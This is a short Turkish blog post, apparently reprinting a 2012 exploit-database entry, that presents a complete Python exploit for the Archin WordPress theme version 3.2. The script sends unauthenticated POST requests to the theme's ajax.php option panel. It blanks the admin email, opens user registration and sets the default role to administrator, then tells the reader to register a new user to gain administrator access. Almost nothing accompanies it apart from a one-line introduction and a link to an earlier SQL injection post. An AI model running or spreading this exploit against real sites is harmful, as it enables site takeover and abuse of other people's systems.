Unauthenticated Configuration Access doğrulanmamış yapılandırma erişimi. Ayağıdaki açıkla sahte e-mail adresine bilgiler göndermek mümkün. Açığa ilişkin açıklamalar şu şekilde.
# Exploit Title: Archin WordPress Theme Unauthenticated Configuration Access # Date: Sept 29, 2012 # Exploit Author: bwall # Vendor Homepage: http://themeforest.net/user/wptitans # Software Link: http://themeforest.net/item/archin-premium-wordpress-business-theme/239432 # Version: 3.2 # Tested on: Ubuntu import httplib, urllib #target site site = "10.10.10.5" #path to ajax.php url = "/wordpress/wp-content/themes/archin/hades_framework/option_panel/ajax.php" def ChangeOption(site, url, option_name, option_value): params = urllib.urlencode({'action': 'save', 'values[0][name]': option_name, 'values[0][value]': option_value}) headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"} conn = httplib.HTTPConnection(site) conn.request("POST", url, params, headers) response = conn.getresponse() print response.status, response.reason data = response.read() print data conn.close() ChangeOption(site, url, "admin_email", "") ChangeOption(site, url, "users_can_register", "1") ChangeOption(site, url, "default_role", "administrator") print "Now register a new user, they are an administrator by default!"
Bir önceki yazımız olan AlamFifa CMS v1.0 Beta Remote SQL Injection Vulnerability başlıklı makalemizde AlamFifa CMS sql injection ve sql injection Alam Fifa CMS hakkında bilgiler verilmektedir.